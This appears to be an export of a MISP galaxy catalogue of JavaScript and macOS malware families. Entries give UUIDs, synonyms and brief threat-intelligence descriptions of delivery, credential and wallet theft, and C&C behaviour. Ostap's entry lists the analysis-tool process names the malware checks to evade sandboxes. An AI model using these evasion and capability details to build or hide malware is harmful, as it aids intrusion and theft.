UUID 36b0f1a0-29a4-4ec5-bca2-18a241881d49 which can be used as unique global reference for inter in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

JADESNOW

JADESNOW is a JavaScript-based downloader malware family associated with the threat cluster UNC5342. JADESNOW utilizes EtherHiding to fetch, decrypt, and execute malicious payloads from smart contracts on the BNB Smart Chain and Ethereum. The input data stored in the smart contract may be Base64-encoded and XOR-encrypted. The final payload in the JADESNOW infection chain is usually a more persistent backdoor like INVISIBLEFERRET.JAVASCRIPT.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular JADESNOW.

Known Synonyms
ChainedDown
Internal MISP references

UUID 76d1e9ce-1d02-4b63-9ce8-8f079c852244 which can be used as unique global reference for JADESNOW in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Jeniva

Internal MISP references

UUID b0631a44-3264-429d-b8bc-3a27e27be305 which can be used as unique global reference for Jeniva in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Jetriz

Internal MISP references

UUID 9e6a0a54-8b55-4e78-a3aa-15d1946882e1 which can be used as unique global reference for Jetriz in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

jspRAT

Internal MISP references

UUID 71903afc-7129-4821-90e5-c490e4902de3 which can be used as unique global reference for jspRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

KongTuke

Kongtuke is a sophisticated TDS system that was initially discovered around May 2024. Making use of compromised CMS Websites, Kongtuke redirects website visitors through a multi-stage infection process ultimately leading to device infection. Initially using fake Update lures, it started to use FakeCaptcha lures at the beginning of 2025. It is likely an initial access service, selling infections to both Ransomware affiliates and other IA vendors like SocGholish.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KongTuke.

Known Synonyms
TAG-124
js.LandUpdate808
Internal MISP references

UUID 399a788c-0487-403d-903e-715afe56b9f0 which can be used as unique global reference for KongTuke in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

KopiLuwak

Internal MISP references

UUID 2269d37b-87e9-460d-b878-b74a2f4c3537 which can be used as unique global reference for KopiLuwak in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

LNKR

The LNKR trojan is a malicious browser extension that will monitor the websites visited by the user, looking for pages with administrative privileges such as blog sites or web-based virtual learning environments. When the administrative user posts to the page, the infected extension will execute stored cross-site scripting attack and injects malicious JavaScript into the legitimate HTML of the page. This is used to redirect the second-party visitors of the site to both benign and malicious domains.

Internal MISP references

UUID 1a85acf3-4bda-49b4-9e50-1231f0b7340a which can be used as unique global reference for LNKR in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

magecart

Magecart is a malware framework intended to steal credit card information from compromised eCommerce websites. Used in criminal activities, it's a sophisticated implant built on top of relays, command and controls and anonymizers used to steal eCommerce customers' credit card information. The first stage is typically implemented in Javascript included into a compromised checkout page. It copies data from "input fields" and send them to a relay which collects credit cards coming from a subset of compromised eCommerces and forwards them to Command and Control servers.

Internal MISP references

UUID f53e404b-0dcd-4116-91dd-cad94fc41936 which can be used as unique global reference for magecart in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

megaMedusa

MegaMedusa is NodeJS DDoS Machine Layer-7 provided by RipperSec Team.

Internal MISP references

UUID 8a51e636-13be-4bdc-a32f-2d832263ba5b which can be used as unique global reference for megaMedusa in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MiniJS

MiniJS is a very simple JavaScript-based first-stage backdoor. The backdoor is probably distributed via spearphishing email. Due to infrastructure overlap, the malware can be attributed to the actor Turla. Comparable JavaScript-based backdoor families of the actor are KopiLuwak and IcedCoffee.

Internal MISP references

UUID 5fd2f4f0-0591-45bb-a843-c194d5e294cd which can be used as unique global reference for MiniJS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MintsLoader

According to Orange Cyberdefense, MintsLoader is a little-known, multi-stage malware loader that has been used since at least February 2023. It has been observed in widespread distribution campaigns between July and October 2024. The name comes from a very characteristic use of an URL parameter “1.php?s=mintsXX" (with XX being numbers).

MintsLoader primarily delivers malicious RAT or infostealing payloads such as AsyncRAT and Vidar through phishing emails, targeting organizations in Europe (Spain, Italy, Poland, etc.). Written in JavaScript and PowerShell, MintsLoader operates through a multi-step infection process involving several URLs and domains, most of which use a domain generation algorithm (DGA) with .top TLD.

Internal MISP references

UUID 0cd219f4-1f3b-4958-b678-173257abd67e which can be used as unique global reference for MintsLoader in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

More_eggs

More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are: - d&exec = download and execute PE file - gtfo = delete files/startup entries and terminate - more_eggs = download additional/new scripts - more_onion = run new script and terminate current script - more_power = run command shell commands

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular More_eggs.

Known Synonyms
SKID
SpicyOmelette
Internal MISP references

UUID 1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f which can be used as unique global reference for More_eggs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

NanHaiShu

NanHaiShu is a remote access tool and JScript backdoor used by Leviathan. NanHaiShu has been used to target government and private-sector organizations that have relations to the South China Sea dispute.

Internal MISP references

UUID 3e46af39-52e8-442f-aff1-38eeb90336fc which can be used as unique global reference for NanHaiShu in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

NodeRAT

Internal MISP references

UUID e3b0ed5c-4e6a-4f50-bef2-1f7112aa31ed which can be used as unique global reference for NodeRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

OFFODE

According to the author, this is a project that will give understanding of bypassing Multi Factor Authentication (MFA) of an outlook account. It is build in node.js and uses playwright for the automation in the backend.

Internal MISP references

UUID 0be6d248-382a-48b8-9a52-dba08aaa891e which can be used as unique global reference for OFFODE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ostap

Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes:

AgentSimulator.exe anti-virus.EXE BehaviorDumper BennyDB.exe ctfmon.exe fakepos_bin FrzState2k gemu-ga.exe (Possible misspelling of Qemu hypervisor’s guest agent, qemu-ga.exe) ImmunityDebugger.exe KMS Server Service.exe ProcessHacker procexp Proxifier.exe python tcpdump VBoxService VBoxTray.exe VmRemoteGuest vmtoolsd VMware2B.exe VzService.exe winace Wireshark

If a blacklisted process is found, the malware terminates.

Ostap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.

Internal MISP references

UUID a3b93781-c51c-4ccb-a856-804331470a9d which can be used as unique global reference for ostap in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

OtterCandy

OtterCandy is a modular JavaScript backdoor that combines features from earlier malware families like OtterCookie and RATatouille (aka INVISIBLEFERRET.JAVASCRIPT). It steals sensitive information including browser credentials and cryptocurrency wallet data, and can execute commands like uploading files, changing directories, and self-termination. The malware communicates via socket.io protocol over port 5000 to receive and execute commands from attackers.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular OtterCandy.

Known Synonyms
HardHatRAT
UNSEENMINK
Internal MISP references

UUID 5488cddb-15e1-489e-b8a7-c030dc459162 which can be used as unique global reference for OtterCandy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

OtterCookie

Internal MISP references

UUID 71fac887-6d86-4f95-99f1-300e2e6caaf6 which can be used as unique global reference for OtterCookie in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ParaSiteSnatcher

Internal MISP references

UUID 9af9557c-04fc-4231-85c4-d1fb30c53cb6 which can be used as unique global reference for ParaSiteSnatcher in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Parrot TDS

This malicious code written in JavaScript is used as Traffic Direction System (TDS). This TDS showes similarities to the Prometheus TDS. According to DECODED Avast.io this TDS has been active since October 2021.

Internal MISP references

UUID dbefad0a-29d3-49d3-b925-116598182dee which can be used as unique global reference for Parrot TDS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PeaceNotWar

PeaceNotWar was integrated into the nodejs module node-ipc as a piece of malware/protestware with wiper characteristics. It targets machines with a public IP address located in Russia and Belarus (using geolocation) and overwrites files recursively using a heart emoji.

Internal MISP references

UUID 6c304481-024e-4f34-af06-6235edacfdcc which can be used as unique global reference for PeaceNotWar in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PindOS

Internal MISP references

UUID 6af1eb7a-bc54-43af-9e15-7187a5f250c4 which can be used as unique global reference for PindOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Powmet

Internal MISP references

UUID 9521ceb0-039d-412c-a38b-7bd9ddfc772e which can be used as unique global reference for Powmet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

QNodeService

According to Trend Micro, this is a Node.js based malware, that can download/upload/execute files, steal credentials from Chrome/Firefox browsers, and perform file management, among other things. It targets Windows and has components for both 32 and 64bit.

Internal MISP references

UUID 52d9260f-f090-4e79-b0b3-0c89f5db6bc6 which can be used as unique global reference for QNodeService in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

QUICKCAFE

QUICKCAFE is an encrypted JavaScript downloader for QUICKRIDE.POWER that exploits the ActiveX M2Soft vulnerabilities. QUICKCAFE is obfuscated using JavaScript Obfuscator.

Internal MISP references

UUID 475766d2-1e99-4d81-89e4-0d0df4a562d0 which can be used as unique global reference for QUICKCAFE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RunForestRun

Active around 2012-2013, this family deployed small JavaScript snippets on infected websites to load exploit kit scripts from DGA-generated domains. It commonly used the Blackhole exploit kit and the Sutra Traffic Distribution System (TDS), which caused it to sometimes be misnamed as Blackhole or Sutra.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RunForestRun.

Known Synonyms
Blackhole
Sutra
Internal MISP references

UUID 1a88e348-e92e-4e88-b32a-38c5dbc3f70a which can be used as unique global reference for RunForestRun in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

s1ngularity Stealer

According to StepSecurity, this is a stealer deployed through a compromised Nx package, targeting system environment properties, cryptocurrency wallets, and development credentials. Data is exfiltrated to Github using stolen tokens.

Internal MISP references

UUID 3f4f13e1-6c9e-4b5f-9481-28d6d423ee24 which can be used as unique global reference for s1ngularity Stealer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

scanbox

Internal MISP references

UUID 0a13a546-91a2-4de0-9bbb-71c9233ce6fa which can be used as unique global reference for scanbox in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Shai-Hulud

A Javascript-based worm propagating through GitHub repositories and exfiltrating tokens and other credentials.

Internal MISP references

UUID 7ca06f21-399b-4b99-b0ac-787643c21ec0 which can be used as unique global reference for Shai-Hulud in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SpyPress

According to ESET, SpyPress is a set of Javascript payloads targeting different webmail frameworks (HORDE, MDAEMON, ROUNDCUBE, ZIMBRA). The observed payloads have common characteristics. All are similarly obfuscated, with variable and function names replaced with random-looking strings. Furthermore, strings used by the code, such as webmail and C&C server URLs, are also obfuscated and contained in an encrypted list. Each of those strings is only decrypted when it is used. Note that the variable and function names are randomized for each sample, so the final SpyPress payloads will have different hashes. Another common characteristic is that there are no persistence or update mechanisms. The payload is fully contained in the email and only executed when the email message is viewed from a vulnerable webmail instance.

Finally, all payloads communicate with their hardcoded C&C servers via HTTP POST requests. There is a small number of C&C servers that are shared by all payloads (there is no separation by victim or payload type).

Internal MISP references

UUID 6a74d86a-af26-4dd3-96fa-71e248288d54 which can be used as unique global reference for SpyPress in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SQLRat

SQLRat campaigns typically involve a lure document that includes an image overlayed by a VB Form trigger. Once a user has double-clicked the embedded image, the form executes a VB setup script. The script writes files to the path %appdata%\Roaming\Microsoft\Templates\, then creates two task entries triggered to run daily. The scripts are responsible for deobfuscating and executing the main JavaScript file mspromo.dot. The file uses a character insertion obfuscation technique, making it appear to contain Chinese characters. After deobfuscating the file, the main JavaScript is easily recognizable. It contains a number of functions designed to drop files and execute scripts on a host system. The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables.

Internal MISP references

UUID d51cb8f8-cca3-46ce-a05d-052df44aef40 which can be used as unique global reference for SQLRat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Starfighter (Javascript)

According to the author, this is a JavaScript based Empire launcher that runs with its own embedded powershell host to not be dependent on local powershell availability.

Internal MISP references

UUID f6c80748-1cce-4f6b-92e9-f8a04ff3464a which can be used as unique global reference for Starfighter (Javascript) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

StarFish

According to IBM X-Force, this is a simple reverse shell. Upon execution, the script generates a unique victim ID by combining the machine's product ID and computer name. It queries a hardcoded server and executes optional commands directly via cmd.exe. Command output is send back using a POST request after completion or a timeout.

Internal MISP references

UUID d150ed7e-a2a0-4a63-9c71-6b01c6974e53 which can be used as unique global reference for StarFish in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Swid

Internal MISP references

UUID d4be22cf-497d-46a0-8d57-30d10d9486e3 which can be used as unique global reference for Swid in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HTML5 Encoding

Internal MISP references

UUID c7ab9e5a-0ec9-481e-95ec-ad08f06cf985 which can be used as unique global reference for HTML5 Encoding in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Maintools.js

Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'.

Internal MISP references

UUID 218f8ca8-1124-4e44-8fbd-4b05b46bde4b which can be used as unique global reference for Maintools.js in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified JS 001 (APT32 Profiler)

Internal MISP references

UUID f2b0ffdc-7d4e-4786-8935-e7036faa174d which can be used as unique global reference for Unidentified JS 001 (APT32 Profiler) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified JS 003 (Emotet Downloader)

According to Max Kersten, Emotet is dropped by a procedure spanned over multiple stages. The first stage is an office file that contains a macro. This macro then loads the second stage, which is either a PowerShell script or a piece of JavaScript, which is this family entry.

Internal MISP references

UUID 7bf28be0-3153-474d-8df7-e12fec511d7e which can be used as unique global reference for Unidentified JS 003 (Emotet Downloader) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified JS 004

A simple loader written in JavaScript found by Marco Ramilli.

Internal MISP references

UUID a15e7c49-4eb6-46f0-8f79-0b765d7d4e46 which can be used as unique global reference for Unidentified JS 004 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified JS 005 (Stealer)

Internal MISP references

UUID a797e9b9-cb3f-484a-9273-ac73e9ea1e06 which can be used as unique global reference for Unidentified JS 005 (Stealer) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified JS 006 (Winter Wyvern)

A script able to list folders and emails in the current Roundcube account, and to exfiltrate email messages to the C&C server by making HTTP requests.

Internal MISP references

UUID 547fed09-38d0-4813-b9b0-870a1d4136df which can be used as unique global reference for Unidentified JS 006 (Winter Wyvern) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified JS 002

Internal MISP references

UUID 7144063f-966b-4277-b316-00eb970ccd52 which can be used as unique global reference for Unidentified JS 002 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Valak

According to PCrisk, Valak is malicious software that downloads JScript files and executes them. What happens next depends on the actions performed by the executed JScript files. It is very likely that cyber criminals behind Valak attempt to use this malware to cause chain infections (i.e., using Valak to distribute other malware).

Research shows that Valak is distributed through spam campaigns, however, in some cases, it infiltrates systems when they are already infected with malicious program such as Ursnif (also known as Gozi).

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Valak.

Known Synonyms
Valek
Internal MISP references

UUID b37b4d91-0ac7-48f5-8fd1-5237b9615cf7 which can be used as unique global reference for Valak in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

js.wd

The threat actor of this family compromised Chrome extension developer accounts and attached malicious code to the extensions. Web Developer 0.4.9, Chrometana 1.1.3, Infinity New Tab 3.12.3, CopyFish 2.8.5, Web Paint 1.2.1, and Social Fixer 20.1.1 were affected by this. TouchVPN and BetterVPN were assumed to be targets as well.

This lead to the execution of another Javascript that substitutes ad banners for their own, effectively hijacking ad traffic. It is also reported that fake pop-up alerts were used to lure victims to download possibly other malware.

Internal MISP references

UUID 62888aea-30b0-47f6-a7bf-1aa758f342fc which can be used as unique global reference for js.wd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

WEEVILPROXY

WEEVILPROXY is a sophisticated and featureful stealer which has a payload primarily written in NodeJS. The developer has put in concerted effort to develop the malware’s breadth of capabilities, including novel techniques not observed in any prior malware campaigns - to our knowledge. These new TTPs include methods to modify Windows Setup and Windows Recovery to enable long-term persistence, as well as methods to patch browser extensions ‘on the fly’.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WEEVILPROXY.

Known Synonyms
JSCEAL
Internal MISP references

UUID e715f9ad-58e7-4f5b-820e-dcb6937b6781 which can be used as unique global reference for WEEVILPROXY in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

witchcoven

Internal MISP references

UUID dcc0fad2-29a9-4b69-9d75-d288ca458bc7 which can be used as unique global reference for witchcoven in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Godzilla Webshell

Internal MISP references

UUID 07e88ccf-6027-412b-99bf-0fa1d3cfb174 which can be used as unique global reference for Godzilla Webshell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Icesword

webshell

Internal MISP references

UUID f7b724e9-2584-4da8-b0c1-a6d9f4a8018e which can be used as unique global reference for Icesword in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

3CX Backdoor (OS X)

Internal MISP references

UUID d5e10bf9-9de8-46be-96d0-aa502b14ffe8 which can be used as unique global reference for 3CX Backdoor (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AMOS

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AMOS.

Known Synonyms
Atomic macOS Stealer
Internal MISP references

UUID 2fa2be52-e44f-4998-bde7-c66cfb6f4521 which can be used as unique global reference for AMOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AppleJeus (OS X)

According to PcRisk AppleJeus is the name of backdoor malware that was distributed by the Lazarus group. They spread this malicious software through a fake app disguised as a cryptocurrency trading application called Celas Trade Pro.

Internal MISP references

UUID ca466f15-8e0a-4030-82cb-5382e3c56ee5 which can be used as unique global reference for AppleJeus (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BANSHEE

Internal MISP references

UUID 5d7b9bcf-a0b6-47eb-8350-a80fac356567 which can be used as unique global reference for BANSHEE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BeaverTail (OS X)

Internal MISP references

UUID 61ec34d7-6c40-4900-9a79-f16b2eec213e which can be used as unique global reference for BeaverTail (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Bella

Internal MISP references

UUID 3c5036ad-2afc-4bc1-a5a3-b31797f46248 which can be used as unique global reference for Bella in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Bundlore

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bundlore.

Known Synonyms
SurfBuyer
Internal MISP references

UUID 5f5f5496-d9f8-4984-aa66-8702741646fe which can be used as unique global reference for Bundlore in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Careto (OS X)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Careto (OS X).

Known Synonyms
Appetite
Mask
Internal MISP references

UUID dcabea75-a433-4157-bb7a-be76de3026ac which can be used as unique global reference for Careto (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Casso

Internal MISP references

UUID 387e1a19-458d-4961-a8e4-3f82463085e5 which can be used as unique global reference for Casso in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CDDS

Google TAG has observed this malware being delivered via watering hole attacks using 0-day exploits, targeting visitors to Hong Kong websites for a media outlet and a prominent pro-democracy labor and political group.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CDDS.

Known Synonyms
Macma
Internal MISP references

UUID 5e4bdac7-b6c8-4c59-996f-babfc3bb3a3c which can be used as unique global reference for CDDS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Choziosi (OS X)

A loader delivering malicious Chrome and Safari extensions.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Choziosi (OS X).

Known Synonyms
ChromeLoader
Chropex
Internal MISP references

UUID 57f75f24-b77b-46b3-a06a-57d49374fb82 which can be used as unique global reference for Choziosi (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CloudMensis

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CloudMensis.

Known Synonyms
BadRAT
Internal MISP references

UUID 557fc183-f51a-4740-b2dd-5e81e6f6690a which can be used as unique global reference for CloudMensis in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CoinThief

CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component.

It was spreading in early 2014 from several different sources: - on Github (where the trojanized compiled binary didn’t match the displayed source code), o - on popular and trusted download sites line CNET's Download.com or MacUpdate.com, and - as cracked applications via torrents camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.

The patcher‘s role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted versions of Bitcoin-Qt 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt adding malicious code that would send nearly all the victim’s Bitcoins to one of the hard-coded addresses belonging to the attacker.

The browser extensions targeted Chrome and Firefox and are disguised as a “Pop-up blocker”. The extensions monitored visited websites, download malicious JavaScripts and injected them into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attacker’s address or simply harvest login credentials to the targeted online service.

The backdoor enabled the attacker to take full control over the victim’s computer: - collect information about the infected computer - execute arbitrary shell scripts on the target computer - upload an arbitrary file from the victim’s hard drive to a remote server - update itself to a newer version

Internal MISP references

UUID 70e73da7-21d3-4bd6-9a0e-0c904e6457e8 which can be used as unique global reference for CoinThief in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Coldroot RAT

Internal MISP references

UUID 076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf which can be used as unique global reference for Coldroot RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Convuster

Internal MISP references

UUID 3819ded3-27ac-4e2f-9cd6-c6ef1642599b which can be used as unique global reference for Convuster in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CpuMeaner

Internal MISP references

UUID 74360d1e-8f85-44d1-8ce7-e76afb652142 which can be used as unique global reference for CpuMeaner in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CreativeUpdater

Internal MISP references

UUID 40fc6f71-75ac-43ac-abd9-c90b0e847999 which can be used as unique global reference for CreativeUpdater in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Crisis

Internal MISP references

UUID 2bb6c494-8057-4d83-9202-fda3284deee4 which can be used as unique global reference for Crisis in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Crossrider

Internal MISP references

UUID 05ddb459-5a2f-44d5-a135-ed3f1e772302 which can be used as unique global reference for Crossrider in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Cthulhu Stealer

Internal MISP references

UUID 549f4c7c-55e3-478e-a84e-e27c5e195c97 which can be used as unique global reference for Cthulhu Stealer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Dacls (OS X)

According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.

Research shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.

Internal MISP references

UUID 81def650-f52e-49a3-a3fe-cb53ffa75d67 which can be used as unique global reference for Dacls (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DarthMiner

Internal MISP references

UUID a8e71805-014d-4998-b21e-3125da800124 which can be used as unique global reference for DarthMiner in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DazzleSpy

Internal MISP references

UUID ba2c7d3c-7f7a-42f7-854c-a6cc0b5eb850 which can be used as unique global reference for DazzleSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Dockster

Internal MISP references

UUID 713d8ec4-4983-4fbb-827c-2ef5bc0e6930 which can be used as unique global reference for Dockster in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Dummy

Internal MISP references

UUID cbf9ff89-d35b-4954-8873-32f59f5e4d7d which can be used as unique global reference for Dummy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

EggShell RAT

Internal MISP references

UUID ab733576-67ad-4cf9-8d11-afecac3f9a6e which can be used as unique global reference for EggShell RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Eleanor

Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.

The Tor service transforms the victim’s computer into a server that provides attackers with full anonymous access to the infected machine via Tor-generated address.

The Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.

The web service is the main malicious component that provides the attackers with the control over the infected machine. After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:

  • Managing files
  • Listing processes
  • Connecting to various database management systems such as MySQL or SQLite
  • Connecting via bind/reverse shell
  • Executing shell command
  • Capturing and browsing images and videos from the victim’s webcam
  • Sending emails with an attachment
Internal MISP references

UUID c221e519-fe3e-416e-bc63-a2246b860958 which can be used as unique global reference for Eleanor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ElectroRAT

According to PCrisk, ElectroRAT is a Remote Access Trojan (RAT) written in the Go programming language and designed to target Windows, MacOS, and Linux users. Cyber criminals behind ElectroRAT target mainly cryptocurrency users. This RAT is distributed via the trojanized Jamm, eTrader, and DaoPoker applications.

Internal MISP references

UUID f8ccf928-7d4f-4999-91a5-9222f148152d which can be used as unique global reference for ElectroRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

EvilOSX

Internal MISP references

UUID 24f3d8e1-3936-4664-b813-74c797b87d9d which can be used as unique global reference for EvilOSX in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

EvilQuest

According to PcRisk, EvilQuest (also known as ThiefQuest) is like many other malicious programs of this type - it encrypts files and creates a ransom message. In most cases, this type of malware modifies the names of encrypted files by appending certain extensions, however, this ransomware leaves them unchanged.

It drops the "READ_ME_NOW.txt" in each folder that contains encrypted data and displays another ransom message in a pop-up window. Additionally, this malware is capable of detecting if certain files are stored on the computer, operates as a keylogger, and receives commands from a Command & Control server.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EvilQuest.

Known Synonyms
ThiefQuest
Internal MISP references

UUID d5b39223-a8cc-4d47-8030-1d7d6312d351 which can be used as unique global reference for EvilQuest in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FailyTale

Internal MISP references

UUID 5dfd704c-a69d-4e93-bd70-68f89fbbb32c which can be used as unique global reference for FailyTale in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FinFisher (OS X)

Internal MISP references

UUID 89ce536c-03b9-4f69-83ce-723f26b36494 which can be used as unique global reference for FinFisher (OS X) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FlashBack

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FlashBack.

Known Synonyms
FakeFlash
Internal MISP references

UUID f92b5355-f398-4f09-8bcc-e06df6fe51a0 which can be used as unique global reference for FlashBack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FlexibleFerret

Internal MISP references

UUID b4461d8d-f41b-4195-a36c-45cd24409f6a which can be used as unique global reference for FlexibleFerret in MISP communities and other software using the MISP galaxy

